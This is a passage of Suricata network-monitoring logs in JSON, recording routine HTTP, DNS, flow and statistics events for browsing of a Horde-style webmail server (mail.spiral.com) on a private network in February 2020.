Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819}} 
{"timestamp":"2020-02-29T00:12:37.000149+0000","event_type":"stats","stats":{"uptime":14409,"capture":{"kernel_packets":134980,"kernel_drops":0},"decoder":{"pkts":134986,"bytes":93032192,"invalid":187,"ipv4":133495,"ipv6":8,"ethernet":134986,"raw":0,"null":0,"sll":0,"tcp":128217,"udp":5076,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2758,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2774,"synack":2765,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1798,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2318,"failed_udp":111},"tx":{"http":4628,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2398}},"flow_mgr":{"closed_pruned":2735,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":128024,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:38.000534+0000","flow_id":146057546899732,"event_type":"flow","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":7663,"start":"2020-02-29T00:11:31.729364+0000","end":"2020-02-29T00:11:37.019380+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:38.435589+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54557,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:38.698958+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922}} {"timestamp":"2020-02-29T00:12:39.885858+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":24332,"tx_id":2}} {"timestamp":"2020-02-29T00:12:40.104202+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34812,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20386,"tx_id":0}} 
{"timestamp":"2020-02-29T00:12:41.000689+0000","flow_id":128482540935253,"event_type":"flow","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":8021,"start":"2020-02-29T00:11:34.022613+0000","end":"2020-02-29T00:11:40.125961+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:43.700464+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:12:43.898656+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54857,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:12:44.000246+0000","event_type":"stats","stats":{"uptime":14416,"capture":{"kernel_packets":135013,"kernel_drops":0},"decoder":{"pkts":135016,"bytes":93048265,"invalid":187,"ipv4":133525,"ipv6":8,"ethernet":135016,"raw":0,"null":0,"sll":0,"tcp":128245,"udp":5078,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2759,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2775,"synack":2766,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1800,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2319,"failed_udp":111},"tx":{"http":4629,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2399}},"flow_mgr":{"closed_pruned":2738,"new_pruned":15,"est_pruned":2365,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22411,"memcap_state":0,"memcap_global":0},"http":{"memuse":60014,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:44.002545+0000","flow_id":2246425387862493,"event_type":"flow","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":173,"bytes_toclient":283,"start":"2020-02-29T00:07:30.133597+0000","end":"2020-02-29T00:07:43.926789+0000","age":13,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.001646+0000","flow_id":150206485572827,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":6}} 
{"timestamp":"2020-02-29T00:12:44.330105+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489}} {"timestamp":"2020-02-29T00:12:44.348475+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.351218+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} 
{"timestamp":"2020-02-29T00:12:44.353979+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:12:44.398481+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.407268+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} 
{"timestamp":"2020-02-29T00:12:44.410082+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":2}} {"timestamp":"2020-02-29T00:12:44.411619+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:12:44.428156+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.430971+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47195},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":4}} {"timestamp":"2020-02-29T00:12:44.449643+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:12:44.451037+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.451681+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:12:44.454644+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.456844+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:12:44.457400+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:12:44.457725+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} {"timestamp":"2020-02-29T00:12:44.458784+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:12:44.479523+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":6}} {"timestamp":"2020-02-29T00:12:44.487927+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:12:44.489034+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":7}} {"timestamp":"2020-02-29T00:12:44.492155+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:12:44.492828+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":8}} 
{"timestamp":"2020-02-29T00:12:44.492847+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:12:44.493398+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:12:44.493548+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} 
